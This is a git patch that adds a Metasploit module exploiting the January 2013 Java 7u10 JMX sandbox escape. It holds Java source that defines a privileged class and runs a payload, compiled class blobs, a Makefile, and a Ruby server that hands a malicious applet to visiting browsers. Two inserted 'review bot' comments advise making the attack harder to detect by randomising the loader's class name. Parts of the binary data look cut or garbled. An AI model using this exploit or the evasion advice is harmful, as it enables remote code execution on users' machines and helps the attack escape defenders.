From 876d889d820bc30d49ad6aa9f62902316af660c1 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Thu, 10 Jan 2013 20:30:43 +0100 Subject: [PATCH] added exploit for j7u10 0day --- data/exploits/j7u10_jmx/B.class | Bin 0 -> 575 bytes data/exploits/j7u10_jmx/Exploit.class | Bin 0 -> 3741 bytes external/source/exploits/j7u10_jmx/B.java | 19 +++ .../source/exploits/j7u10_jmx/Exploit.java | 73 +++++++++++ external/source/exploits/j7u10_jmx/Makefile | 18 +++ .../multi/browser/java_jre17_jmxbean.rb | 122 ++++++++++++++++++ 6 files changed, 232 insertions(+) create mode 100755 data/exploits/j7u10_jmx/B.class create mode 100755 data/exploits/j7u10_jmx/Exploit.class create mode 100755 external/source/exploits/j7u10_jmx/B.java create mode 100755 external/source/exploits/j7u10_jmx/Exploit.java create mode 100644 external/source/exploits/j7u10_jmx/Makefile create mode 100644 modules/exploits/multi/browser/java_jre17_jmxbean.rb diff --git a/data/exploits/j7u10_jmx/B.class b/data/exploits/j7u10_jmx/B.class new file mode 100755 index 0000000000000000000000000000000000000000..ff4cee08d89c073747274041de26515fdac3d425 GIT binary patch literal 575 zcmaix+fKqj5QhJOLbX=T;u+(Wg$sB9lmv)g;UU3byewryN=j>bAo4`s>Xk$jAHat) zP74t=CT5eF-G64j+1Y*nczFX*#esqZG77TD$;c}xU_(Yx#-@xdLh{(OO}{~iYvmq6 zYC8i#NOw$ITm<93aIf{g#Y)@_Y(haRcSia|uUWc1tX=j;!tm<^rRxN)AD5w-}1S z7our|AVTS9X45c)=d~T%cOAxUU=C6ve=Qm@k@TtK*#y(Yf232N=-8?|*Jh3Wqj*2+% y);M0|dT^b@r%+efuk+%OBO9``hz+PTgY=5TEh8UUpA(d*PlgFuR#L3Tkp2X^YK1xg literal 0 HcmV?d00001 
diff --git a/data/exploits/j7u10_jmx/Exploit.class b/data/exploits/j7u10_jmx/Exploit.class new file mode 100755 index 0000000000000000000000000000000000000000..1fb9416e3f4debb4e51605cd255ac8d031dbe568 GIT binary patch literal 3741 zcma)9X?xqo5q_5!APAN$%94%RmVC$#DaoX*TsGvmkz_kjO38Mp%3+;0g-Do!Oae3r z%2Jx9chW0ulQ!v# zHWwTj6&Y6*xTv~YC8Js$STGiifs$bt2P}Khxnd4Xnclopc+{{9C6l2m!wu5h zAU(ksj54%kmu+v}^sGEX&qgo8h++RmeUtZ@^QL;|W&6{T}?nFJaR4F-@m*VMD@l8xJ?AwsaX~#S3 z)a=5UrMy}3EXQW(TQ`|@gyYlZW#7nk9aqJ-@NE?nc!57oGwc=imXjV|_RKN9({nYi zQu7F=X_Qrb2j8U>jHkq2RD2IFN_a`d_wfT2FXI&zKg5q1j^v$kx>~c-3+1IWWx}wl zrn_jm>Bq`TQ{yCNg*aZbN+PFF@nigi;qcw9Q}I*0O2>%g}a6(zyTGfxZ&<~!zP!!x+VNd#jkN)#mBknp)E`| z7J27o%Pvq3s-9cRdyXsNH!7aNTM~Y&;&&M3K7Y@!T^ze0<+-^9Gw-SR1OB*H4nprE zN;hxvVU9&C_V>3&p>`g2)^fd?QBpC+t$NlG2a?L;|B1Rnp32KJn}x; zgD7j*l##M&d+ETE(L2tbHcMua&alzSwsb;y=1J#WV3NwxuszG5!lb4_N!*J6o6IRW z$-6eD8%EH8w{eD(TkShQNT2a7yKF)dcd4qalp ztV!`6O|GL?Z=>N(f2gctm)^bt?QiIee{2=IbMHXAju>fHu!k%6`pP{*xhL`g`f}kF z^z*5G{#3u1>d&rXzpiTJ>;RuU=uaLHlLz7hnp(#pecK8Sui_rPL)#Yn0Et{!YtQB) zT3a?3)jG0uBtOKU-l=tlX_6#;``tr}HlPjh=)->WArXCuLTnAWYb(e{v@Q-gt|==> zai?kDX-YUvt>UQOt;MAc+lU{_=3-j++Fo{OI|vxx=ypQExLWUNnc5Y!K)#mm5gz|u zKmLe_KO*wo+YCUVJjU}+f~Q?7uhNvxQ>tqCzc3miFQE(`3KelGRK~-ht2j#tCPFph zh0MPli7T8+BlN$>SrZ>z1$#Sl3*j8qedH#hf91G|OHrEl`4tnIV-1>z2qSF_pTIBZ Nt 0 ) + bos.write( buffer, 0, length ); + // convert it to a simple byte array + buffer = bos.toByteArray(); + + JmxMBeanServerBuilder localJmxMBeanServerBuilder = new JmxMBeanServerBuilder(); + JmxMBeanServer localJmxMBeanServer = (JmxMBeanServer)localJmxMBeanServerBuilder.newMBeanServer("", null, null); + MBeanInstantiator localMBeanInstantiator = localJmxMBeanServer.getMBeanInstantiator(); + ClassLoader a = null; + Class localClass1 = localMBeanInstantiator.findClass("sun.org.mozilla.javascript.internal.Context", a); + Class localClass2 = localMBeanInstantiator.findClass("sun.org.mozilla.javascript.internal.GeneratedClassLoader", a); + MethodHandles.Lookup localLookup = 
MethodHandles.publicLookup();
+ MethodType localMethodType1 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { MethodType.class });
+ MethodHandle localMethodHandle1 = localLookup.findVirtual(MethodHandles.Lookup.class, "findConstructor", localMethodType1);
+ MethodType localMethodType2 = MethodType.methodType(Void.TYPE);
+ MethodHandle localMethodHandle2 = (MethodHandle)localMethodHandle1.invokeWithArguments(new Object[] { localLookup, localClass1, localMethodType2 });
+ Object localObject1 = localMethodHandle2.invokeWithArguments(new Object[0]);
+ MethodType localMethodType3 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { String.class, MethodType.class });
+ MethodHandle localMethodHandle3 = localLookup.findVirtual(MethodHandles.Lookup.class, "findVirtual", localMethodType3);
+ MethodType localMethodType4 = MethodType.methodType(localClass2, ClassLoader.class);
+ MethodHandle localMethodHandle4 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass1, "createClassLoader", localMethodType4 });
+ Object localObject2 = localMethodHandle4.invokeWithArguments(new Object[] { localObject1, null });
+ MethodType localMethodType5 = MethodType.methodType(Class.class, String.class, new Class[] { byte[].class });
+ MethodHandle localMethodHandle5 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass2,"defineClass", localMethodType5 });
+ Class localClass3 = (Class)localMethodHandle5.invokeWithArguments(new Object[] { localObject2, null, buffer });
+ localClass3.newInstance();
+
+ Payload.main(null);
+ //Runtime.getRuntime().exec("calc.exe");
+ }
+ catch(Throwable ex)
+ {
+ //exception.printStackTrace();
+ }
+ }
+
+}
diff --git a/external/source/exploits/j7u10_jmx/Makefile b/external/source/exploits/j7u10_jmx/Makefile
new file mode 100644
index 0000000000..3fa70edee3
--- /dev/null
+++ b/external/source/exploits/j7u10_jmx/Makefile
@@ -0,0 +1,18 @@
+# rt.jar must be in the classpath!
+
+CLASSES = \
+ Exploit.java \
+ B.java
+
+.SUFFIXES: .java .class
+.java.class:
+ javac -source 1.2 -target 1.2 -cp "../../../../data/java" $*.java
+
+all: $(CLASSES:.java=.class)
+
+install:
+ mv Exploit.class ../../../../data/exploits/j7u10_jmx/
+ mv B.class ../../../../data/exploits/j7u10_jmx/
+
+clean:
+ rm -rf *.class
diff --git a/modules/exploits/multi/browser/java_jre17_jmxbean.rb b/modules/exploits/multi/browser/java_jre17_jmxbean.rb
new file mode 100644
index 0000000000..b1e21a9f21
--- /dev/null
+++ b/modules/exploits/multi/browser/java_jre17_jmxbean.rb
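Review bot: The `javac -source 1.2 -target 1.2` flags in the `.java.class` rule are misleading for this source: Exploit.java uses `java.lang.invoke.MethodHandles`/`MethodType`, which only exist on a Java 7 runtime, so the old class-file version buys no compatibility, and without `-bootclasspath` javac compiles against whichever JDK's rt.jar happens to be installed (typically with its bootstrap-class-path warning). Because the compiled `.class` files are committed under `data/exploits/j7u10_jmx/` and `install` merely moves them, a reviewer cannot reproduce or verify those binaries from this source without knowing the JDK that built them. I would either switch to `-source 1.7 -target 1.7` or make the header comment state the contract, e.g. replace `# rt.jar must be in the classpath!` with `# Build with a JDK 7 javac; classes are compiled against that JDK's rt.jar (no -bootclasspath), and the resulting .class files are what is checked in under data/exploits/j7u10_jmx/.` The `clean` target only removes files, so `rm -f *.class` is sufficient.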
@@ -0,0 +1,122 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+require 'rex'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpServer::HTML
+ include Msf::Exploit::EXE
+
+ include Msf::Exploit::Remote::BrowserAutopwn
+ autopwn_info({ :javascript => false })
+
+ def initialize( info = {} )
+
+ super( update_info( info,
+ 'Name' => 'Java Applet JMX Remote Code Execution',
+ 'Description' => %q{
+ This module abuses the JMX classes from a Java Applet to run arbitrary Java
+ code outside of the sandbox as exploited in the wild in January of 2013. The
+ vulnerability affects Java version 7u10 and earlier.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' => [ 'egypt', 'sinn3r', 'juan vazquez' ],
+ 'References' => [
+ [ 'URL', 'http://malware.dontneedcoffee.com/2013/01/0-day-17u10-spotted-in-while-disable.html' ],
+ [ 'URL', 'http://labs.alienvault.com/labs/index.php/2013/new-year-new-java-zeroday/' ]
+ ],
+ 'Platform' => [ 'java', 'win', 'osx', 'linux' ],
+ 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
+ 'Targets' =>
+ [
+ [ 'Generic (Java Payload)',
+ {
+ 'Platform' => ['java'],
+ 'Arch' => ARCH_JAVA,
+ }
+ ],
+ [ 'Windows x86 (Native Payload)',
+ {
+ 'Platform' => 'win',
+ 'Arch' => ARCH_X86,
+ }
+ ],
+ [ 'Mac OS X x86 (Native Payload)',
+ {
+ 'Platform' => 'osx',
+ 'Arch' => ARCH_X86,
+ }
+ ],
+ [ 'Linux x86 (Native Payload)',
+ {
+ 'Platform' => 'linux',
+ 'Arch' => ARCH_X86,
+ }
+ ],
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'Jan 10 2013'
+ ))
+ end
+
+
+ def setup
+ path = File.join(Msf::Config.install_root, "data", "exploits", "j7u10_jmx", "Exploit.class")
+ @exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
+ path =
File.join(Msf::Config.install_root, "data", "exploits", "j7u10_jmx", "B.class")
+ @loader_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
+
+ @exploit_class_name = rand_text_alpha("Exploit".length)
+ @exploit_class.gsub!("Exploit", @exploit_class_name)
+ super
+ end
+
+ def on_request_uri(cli, request)
+ print_status("handling request for #{request.uri}")
+
+ case request.uri
+ when /\.jar$/i
+ jar = payload.encoded_jar
+ jar.add_file("#{@exploit_class_name}.class", @exploit_class)
+ jar.add_file("B.class", @loader_class)
+ metasploit_str = rand_text_alpha("metasploit".length)
+ payload_str = rand_text_alpha("payload".length)
+ jar.entries.each { |entry|
+ entry.name.gsub!("metasploit", metasploit_str)
+ entry.name.gsub!("Payload", payload_str)
+ entry.data = entry.data.gsub("metasploit", metasploit_str)
+ entry.data = entry.data.gsub("Payload", payload_str)
+ }
+ jar.build_manifest
+
+ send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
+ when /\/$/
+ payload = regenerate_payload(cli)
+ if not payload
+ print_error("Failed to generate the payload.")
+ send_not_found(cli)
+ return
+ end
+ send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
+ else
+ send_redirect(cli, get_resource() + '/', '')
+ end
+
+ end
+
+ def generate_html
+ html = %Q|Loading, Please Wait...|
+ html += %Q|

Loading, Please Wait...

|
+ html += %Q||
+ html += %Q||
+ return html
+ end
+
+end
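Review bot: The name randomisation in this module is uneven: `@exploit_class_name` is drawn once in `setup`, so every victim for the life of the module instance receives the same class name, while `metasploit`/`Payload` are re-randomised on every `.jar` request in `on_request_uri`, and the loader class added with `jar.add_file("B.class", @loader_class)` is never renamed at all. Together with the constant `Loading, Please Wait...` page text, that fixed `B.class` entry is a stable network and on-disk indicator for this applet. Renaming `B` cannot reuse the `gsub!` trick, since a one-letter name would also rewrite every unrelated 0x42 byte in the class file; the loader would need a longer placeholder name in B.java and Exploit.java so both class files can be patched with an equal-length random string the way `Exploit` is. The length-preserving replacement itself deserves a comment where it happens, e.g. `# same length as "Exploit": CONSTANT_Utf8 entries carry an explicit byte length, so the name must not grow or shrink.` The `if not payload` guard reads more idiomatically as `unless payload`.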